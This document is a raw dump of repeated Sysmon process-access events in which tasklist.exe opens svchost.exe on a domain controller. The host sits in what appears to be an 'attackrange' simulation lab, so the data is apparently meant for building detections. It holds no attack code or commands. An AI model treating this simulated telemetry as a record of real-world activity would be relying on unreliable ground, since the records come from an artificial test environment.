21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025977Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025976Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025975Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025974Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025973Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025972Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025971Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025970Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025969Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025968Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025967Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025966Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025965Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025964Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025963Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025962Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025961Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025960Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025959Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025958Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025957Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025956Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025955Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.738{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025954Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 